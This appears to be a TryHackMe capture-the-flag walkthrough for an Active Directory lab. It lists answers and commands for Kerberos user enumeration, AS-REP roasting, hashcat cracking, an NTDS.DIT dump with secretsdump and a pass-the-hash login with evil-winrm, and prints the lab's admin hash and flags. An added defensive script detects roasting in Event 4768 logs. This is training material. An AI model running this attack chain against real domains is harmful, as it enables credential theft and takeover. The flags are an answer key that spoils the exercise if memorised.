What tool will allow us to enumerate port 139/445?
Answer: enum4linux
What is the NetBIOS-Domain Name of the machine?
Answer: THM-AD
Context: If you run the following nmap command, nmap -A -v -p139,445 10.10.79.210, the results will give you the answer. You can also use enum4linux <ip>.
What invalid TLD do people commonly use for their Active Directory Domain?
Answer: .local
What command within Kerbrute will allow us to enumerate valid usernames?
Answer: userenum
Context: First install kerbrute by downloading the kerbrute_linux_amd64 file from the GH repo here. Run the command ./kerbrute_linux_amd64 -h to list the available commands.
What notable account is discovered? (These should jump out at you)
Answer: svc-admin
Context: This one requires some setup since kerbrute expects a domain name and not an IP address. We know from task 3 that the domain is spookysec.local, so you will need to edit the hosts file (/etc/hosts) and add the line <ip> spookysec.local
Once that is complete you should be able to run the following command: ./kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt
What is the other notable account that is discovered? (These should jump out at you)
Answer: backup
Abusing Kerberos
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
Answer: svc-admin
Context: You will first need to create a new txt file which includes the 2 notable accounts, svc-admin and backup. Run the script without arguments using the command python3 /opt/impacket/examples/GetNPUsers.py
This will give you the parameters you require for the command, which should end up looking something like the following (replace the txt file and IP with the correct ones):
python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile yourtxtfile.txt -dc-ip 10.10.xx.xx spookysec.local/
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Answer: Kerberos 5, etype 23, AS-REP
Context: From the results of the previous question, look at the first part of the hash (the prefix before the username) and compare it in the wiki here.
What mode is the hash?
Answer: 18200
Context: Use the information from the previous question in the Wiki; the hash-mode is provided next to the example hash.
Now crack the hash with the modified password list provided. What is the user account's password?
Answer: management2005
Context: Store the hash in a txt file and run the command hashcat -m18200 hash.txt passwordlist.txt
The answer will be found appended to the end of the hash in the results.
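The AS-REP roasting step above, seen from the domain controller's side, as an added detection example that is not part of the original walkthrough: a TGT logged as Event ID 4768 with Pre-Authentication Type 0 and Ticket Encryption Type 0x17 (RC4-HMAC, the etype 23 in the hashcat name) is the fingerprint of an account with pre-authentication disabled being roasted. The log records below are constructed, and the key=value export format and source IPs are assumptions.

```python
# Added example (not from the walkthrough): scan Windows Security 4768 events
# (TGT requested) for the trace an AS-REP roast leaves on the DC: a TGT issued
# with Pre-Authentication Type 0 (no pre-auth, i.e. the account has
# DONT_REQ_PREAUTH set) and Ticket Encryption Type 0x17 (RC4-HMAC = etype 23).
# Field names follow the 4768 event schema; the log lines are constructed.
from collections import Counter

SAMPLE_LOG = """\
EventID=4768 TargetUserName=svc-admin TargetDomainName=SPOOKYSEC.LOCAL PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.0.5
EventID=4768 TargetUserName=backup TargetDomainName=SPOOKYSEC.LOCAL PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.0.5
EventID=4768 TargetUserName=alice TargetDomainName=SPOOKYSEC.LOCAL PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.0.9
EventID=4769 TargetUserName=alice TargetDomainName=SPOOKYSEC.LOCAL PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.0.9
EventID=4768 TargetUserName=svc-admin TargetDomainName=SPOOKYSEC.LOCAL PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.0.5
"""

RC4_HMAC = 0x17   # etype 23, the only etype hashcat mode 18200 accepts
NO_PREAUTH = 0    # Pre-Authentication Type 0: no pre-auth was performed


def parse_event(line):
    """Split a 'key=value key=value' record into a dict of strings."""
    return dict(tok.split("=", 1) for tok in line.split())


def is_asrep_roast(ev):
    """True for a 4768 event that shows both roasting signals."""
    return (ev.get("EventID") == "4768"
            and int(ev.get("PreAuthType", -1)) == NO_PREAUTH
            and int(ev.get("TicketEncryptionType", "0"), 16) == RC4_HMAC)


def find_asrep_roast(log_text):
    """Return {(user, domain, source_ip): count} for matching 4768 events.
    A pre-auth-disabled account being hit from one IP is the alert unit."""
    counts = Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if is_asrep_roast(ev):
            counts[(ev["TargetUserName"], ev["TargetDomainName"], ev["IpAddress"])] += 1
    return dict(counts)


if __name__ == "__main__":
    for (user, domain, ip), n in find_asrep_roast(SAMPLE_LOG).items():
        print(f"AS-REP roast candidate: {user}@{domain} from {ip} ({n} requests)")
```

The fix on the defender side is to clear "Do not require Kerberos preauthentication" on the flagged account and disable RC4 for it, so the 4768 no longer carries either signal.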
Domain Privilege Escalation
What method allowed us to dump NTDS.DIT?
Answer: DRSUAPI
Context: Once you run the script (secretsdump.py) using the command python3 secretsdump.py -dc-ip spookysec.local backup:backup251786@spookysec.local, look at the results and you will see the method used.
What is the Administrators NTLM hash?
Answer: 0e0363213e37b94221497260b0bcb4fc
Context: Take a look at the output again.
What method of attack could allow us to authenticate as the user without the password?
Answer: pass the hash
Context: Google it 🙂
Using a tool called Evil-WinRM what option will allow us to use a hash?
Answer: -h
Context: Google as well; the readme file in their GH repo has a list of all the options.
Flag Submission
For this one, make sure you have Evil-WinRM installed and proceed to log in using the Administrator username and hash from the previous questions. Your command should look like evil-winrm -i [Target_IP] -u Administrator -H [Administrator_Hash]
svc-admin
Answer: TryHackMe{K3rb3r0s_Pr3_4uth}
backup
Answer: TryHackMe{B4ckM3UpSc0tty!}
Administrator
Answer: TryHackMe{4ctiveD1rectoryM4st3r}